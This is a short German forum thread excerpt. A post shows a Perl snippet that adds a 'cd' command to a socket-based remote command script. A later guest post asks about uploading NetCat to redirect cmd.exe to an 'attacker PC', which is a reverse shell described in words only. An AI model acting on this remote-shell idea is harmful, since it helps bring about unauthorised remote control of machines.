  Mit dem Script oben kannst du auch Kommandos hinzufügen:
  
  Code: (dl )
  
  1 2 3 4 5 6
  
  addcmd:^cd:(.+)$:eoc my ($socket,$dir)=@_; my $ok=chdir($dir); return "ERR chdir $dir ($!)" unless $ok; return "MSG: $dir"; eoc
  
  Das fügt das Kommando cd hinzu:
  cd:..
  Last edited: 2013-09-30 23:22:47 +0200 (CEST)
  - +2 replies
  - Whook
    
    2013-10-01 03:08
    
    User since
    2013-09-30
    7 Artikel
    BenutzerIn
    
    Vielen Dank dafür!
    Das probiere ich gleich einmal aus.
    - Gast name is required.
      
      2016-01-27 17:00
      
      Hat das funktioniert?
      
      Haettest du nicht auch NetCat hochladen koennen cmd.exe dadurch zu deinem Angreifer PC umleiten?
      Last edited: 2016-01-27 17:45:55 +0100 (CET)

View all threads created 2013-09-30 14:50.